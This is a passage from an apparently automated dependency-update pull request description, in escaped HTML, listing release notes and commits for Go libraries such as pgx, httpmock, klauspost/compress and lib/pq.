1.25+\u003c/li\u003e\n\u003cli\u003eAdd SCRAM-SHA-256-PLUS support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eAdd OAuth authentication support for PostgreSQL 18 (David Schneider)\u003c/li\u003e\n\u003cli\u003eAdd PostgreSQL protocol 3.2 support (Dirkjan Bussink)\u003c/li\u003e\n\u003cli\u003eAdd tsvector type support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eSkip Describe Portal for cached prepared statements reducing network round trips\u003c/li\u003e\n\u003cli\u003eMake LoadTypes query easier to support on \u0026quot;postgres-like\u0026quot; servers (Jelte Fennema-Nio)\u003c/li\u003e\n\u003cli\u003eDefault empty user to current OS user matching libpq behavior (ShivangSrivastava)\u003c/li\u003e\n\u003cli\u003eOptimize LRU statement cache with custom linked list and node pooling (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize date scanning by replacing regex with manual parsing (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize pgio append/set functions with direct byte shifts (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eMake RowsAffected faster (Abhishek Chanda)\u003c/li\u003e\n\u003cli\u003eFix: Pipeline.Close panic when server sends multiple FATAL errors (Varun Chawla)\u003c/li\u003e\n\u003cli\u003eFix: ContextWatcher goroutine leak (Hank Donnay)\u003c/li\u003e\n\u003cli\u003eFix: stdlib discard connections with open transactions in ResetSession (Jeremy Schneider)\u003c/li\u003e\n\u003cli\u003eFix: pipelineBatchResults.Exec silently swallowing lastRows error\u003c/li\u003e\n\u003cli\u003eFix: ColumnTypeLength using BPCharArrayOID instead of BPCharOID\u003c/li\u003e\n\u003cli\u003eFix: TSVector text encoding returning nil for valid empty tsvector\u003c/li\u003e\n\u003cli\u003eFix: wrong error messages for Int2 and Int4 underflow\u003c/li\u003e\n\u003cli\u003eFix: Numeric nil Int pointer dereference with Valid: true\u003c/li\u003e\n\u003cli\u003eFix: reversed strings.ContainsAny arguments in Numeric.ScanScientific\u003c/li\u003e\n\u003cli\u003eFix: message length parsing on 32-bit platforms\u003c/li\u003e\n\u003cli\u003eFix: FunctionCallResponse.Decode mishandling of signed result size\u003c/li\u003e\n\u003cli\u003eFix: returning wrong error in configTLS when DecryptPEMBlock fails (Maxim Motyshen)\u003c/li\u003e\n\u003cli\u003eFix: misleading ParseConfig error when default_query_exec_mode is invalid (Skarm)\u003c/li\u003e\n\u003cli\u003eFix: missed Unwatch in Pipeline error paths\u003c/li\u003e\n\u003cli\u003eClarify too many failed acquire attempts error message\u003c/li\u003e\n\u003cli\u003eBetter error wrapping with context and SQL statement (Aneesh Makala)\u003c/li\u003e\n\u003cli\u003eEnable govet and ineffassign linters (Federico Guerinoni)\u003c/li\u003e\n\u003cli\u003eGuard against various malformed binary messages (arrays, hstore, multirange, protocol messages)\u003c/li\u003e\n\u003cli\u003eFix various godoc comments (ferhat elmas)\u003c/li\u003e\n\u003cli\u003eFix typos in comments (Oleksandr Redko)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.8.0 (December 26, 2025)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/4e4eaedb47b7b3cfba0a1b0a9e6a3f015764f046\"\u003e\u003ccode\u003e4e4eaed\u003c/code\u003e\u003c/a\u003e Release v5.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/62731882651a90348febb43b2119b5f8bd9272de\"\u003e\u003ccode\u003e6273188\u003c/code\u003e\u003c/a\u003e Fix batch result format corruption when using cached prepared statements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f7b90c2f1ac099f00e67d6d4d0fee6deb330bc94\"\u003e\u003ccode\u003ef7b90c2\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jackc/pgx/issues/2524\"\u003e#2524\u003c/a\u003e from dbussink/pipeline-result-format-reuse\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/3ce6d75be4baa8d1e4b4f880da5f9ad68ab14e7f\"\u003e\u003ccode\u003e3ce6d75\u003c/code\u003e\u003c/a\u003e Add failing test: batch scan corrupted in cache_statement mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/b4d8e62b6616d0c09c5021500363de0c56e01631\"\u003e\u003ccode\u003eb4d8e62\u003c/code\u003e\u003c/a\u003e Release v5.9.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/c227cd4f76fa2b1a47c0156621e05c076f4cf5c9\"\u003e\u003ccode\u003ec227cd4\u003c/code\u003e\u003c/a\u003e Bump minimum Go version from 1.24 to 1.25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f492c14836d7d442e8103b09f2c0c74a80c56347\"\u003e\u003ccode\u003ef492c14\u003c/code\u003e\u003c/a\u003e Use reflect.TypeFor instead of reflect.TypeOf for static types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/ad8fb08d3f1a36c0e475c9f80dc9bb19d075d8e2\"\u003e\u003ccode\u003ead8fb08\u003c/code\u003e\u003c/a\u003e Use sync.WaitGroup.Go to simplify goroutine spawning\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/303377376df43ba3d1a99728eaa9f9a6bcaab767\"\u003e\u003ccode\u003e3033773\u003c/code\u003e\u003c/a\u003e Remove go1.26 build tag from synctest test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/83ffb3c2220737cf11c7dd88c80be9166753102f\"\u003e\u003ccode\u003e83ffb3c\u003c/code\u003e\u003c/a\u003e Validate multirange element count against source length before allocating\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jackc/pgx/compare/v5.7.5...v5.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jarcoal/httpmock` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jarcoal/httpmock/releases\"\u003egithub.com/jarcoal/httpmock's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.4.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003etest: also test with go v1.25 and use golangci-lint v2.4.0 by \u003ca href=\"https://github.com/maxatome\"\u003e\u003ccode\u003e@​maxatome\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/164\"\u003ejarcoal/httpmock#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid data race when closing body by \u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e made his first contribution in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ehttps://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/314d58a0690c92c71b2a9de2d62d52c74c328546\"\u003e\u003ccode\u003e314d58a\u003c/code\u003e\u003c/a\u003e fix: protect all body-related methods with mutext\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/e482896659149810cdc8b9262611a0059150b661\"\u003e\u003ccode\u003ee482896\u003c/code\u003e\u003c/a\u003e fix: avoid data race when closing body\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/c97714566220b6410cf4f7937db771d1876e8e98\"\u003e\u003ccode\u003ec977145\u003c/code\u003e\u003c/a\u003e test: also test with go v1.25 and use golangci-lint v2.4.0\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/klauspost/compress` from 1.18.0 to 1.18.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/klauspost/compress/releases\"\u003egithub.com/klauspost/compress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.18.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix crash when changing encoder dictionary with same ID by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1135\"\u003eklauspost/compress#1135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Default to full zero frames by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1134\"\u003eklauspost/compress#1134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: Clean up histogram order by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1133\"\u003eklauspost/compress#1133\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egzhttp: Add zstandard to server handler wrapper by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1121\"\u003eklauspost/compress#1121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add ResetWithOptions to encoder/decoder by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1122\"\u003eklauspost/compress#1122\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: preserve qvalue when extra parameters follow in Accept-Encoding by \u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ethaizone\"\u003e\u003ccode\u003e@​ethaizone\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1124\"\u003eklauspost/compress#1124\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/zwass\"\u003e\u003ccode\u003e@​zwass\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1125\"\u003eklauspost/compress#1125\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.3\u003c/h2\u003e\n\u003cp\u003eDownstream CVE-2025-61728\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://redirect.github.com/golang/go/issues/77102\"\u003egolang/go#77102\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eflate: Fix invalid encoding on level 9 with single value input by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1115\"\u003eklauspost/compress#1115\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: reduce stateless allocations by \u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump github/codeql-action from 3.30.5 to 4.31.2 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1111\"\u003eklauspost/compress#1111\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev1.18.1\u003c/code\u003e is marked \u0026quot;retracted\u0026quot; due to invalid flate/zip/gzip encoding.\u003c/p\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix incorrect buffer size in dictionary encodes by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1059\"\u003eklauspost/compress#1059\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003es2: check for cap, not len of buffer in EncodeBetter/Best by \u003ca href=\"https://github.com/vdarulis\"\u003e\u003ccode\u003e@​vdarulis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1080\"\u003eklauspost/compress#1080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add simple zstd EncodeTo/DecodeTo functions by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1079\"\u003eklauspost/compress#1079\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezlib: Avoiding extra allocation in zlib.reader.Reset by \u003ca href=\"https://github.com/travelpolicy\"\u003e\u003ccode\u003e@​travelpolicy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1086\"\u003eklauspost/compress#1086\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: remove redundant err check in zstdReader by \u003ca href=\"https://github.com/ryanfowler\"\u003e\u003ccode\u003e@​ryanfowler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1090\"\u003eklauspost/compress#1090\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c5e0077f50a3268a27b02816adc48ebfb535c65e\"\u003e\u003ccode\u003ec5e0077\u003c/code\u003e\u003c/a\u003e zstd: Fix encoder changing dictionary with same ID (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1135\"\u003e#1135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/fd3f23e2d1d0fca18f38ee2dfedb73d0ca5b02e5\"\u003e\u003ccode\u003efd3f23e\u003c/code\u003e\u003c/a\u003e zstd: Default to full zero frames (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1134\"\u003e#1134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/8233c587ef6e7b0f5168bfc08e63ea37e97b2d36\"\u003e\u003ccode\u003e8233c58\u003c/code\u003e\u003c/a\u003e flate: Clean up histogram order (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1133\"\u003e#1133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/bcf0d1289c8df01178af919dd5d8ff83afaa5471\"\u003e\u003ccode\u003ebcf0d12\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1132\"\u003e#1132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/cf758fe1c54e3049f302474d2a98afd3acc1a884\"\u003e\u003ccode\u003ecf758fe\u003c/code\u003e\u003c/a\u003e ci: Upgrade Go versions, clean up (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1130\"\u003e#1130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/77cc5203de2eb0034a63eace182bb28aa869cb83\"\u003e\u003ccode\u003e77cc520\u003c/code\u003e\u003c/a\u003e Add v1.18.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c03560f58ab1f595f17838b482483849d585d0c2\"\u003e\u003ccode\u003ec03560f\u003c/code\u003e\u003c/a\u003e zstd: Add ResetWithOptions to encoder/decoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/0874ab860fc90779cb032996aee0c9e11880738c\"\u003e\u003ccode\u003e0874ab8\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1126\"\u003e#1126\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4a368369aa67e1da850e9a38fbbbea7c20cfd377\"\u003e\u003ccode\u003e4a36836\u003c/code\u003e\u003c/a\u003e doc: Clarify documentation in readme (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1125\"\u003e#1125\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4309644706928691448da21eaa03895b982e086c\"\u003e\u003ccode\u003e4309644\u003c/code\u003e\u003c/a\u003e zstd: document concurrency option handling in encoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1124\"\u003e#1124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.0...v1.18.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/lib/pq` from 1.10.9 to 1.12.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/releases\"\u003egithub.com/lib/pq's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e. See \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are simple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which is \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// Old\r\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, \u0026quot;text\u0026quot;, \u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\r\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and \u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport connection service file to load connection details (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1285\"\u003e#1285\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslrootcert=system\u003c/code\u003e and use \u003ccode\u003e~/.postgresql/root.crt\u003c/code\u003e as the default value of sslrootcert (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1280\"\u003e#1280\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/lib/pq/issues/1281\"\u003e#1281\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd a new \u003ccode\u003epqerror\u003c/code\u003e package with PostgreSQL error codes (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1275\"\u003e#1275\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eFor example, to test if an error is a UNIQUE constraint violation:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eif pqErr, ok := errors.AsType[*pq.Error](https://github.com/lib/pq/blob/HEAD/err); ok \u0026amp;\u0026amp; pqErr.Code == pqerror.UniqueViolation {\r\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\r\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo make this a bit more convenient, it also adds a \u003ccode\u003epq.As()\u003c/code\u003e function:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003epqErr := pq.As(err, pqerror.UniqueViolation)\r\nif pqErr != nil {\r\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\r\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix SSL key permission check to allow modes stricter than 0600/0640 (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1265\"\u003e#1265\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/blob/master/CHANGELOG.md\"\u003egithub.com/lib/pq's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.1 (2026-03-30)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0 (2026-03-18)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e.\nSee \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for 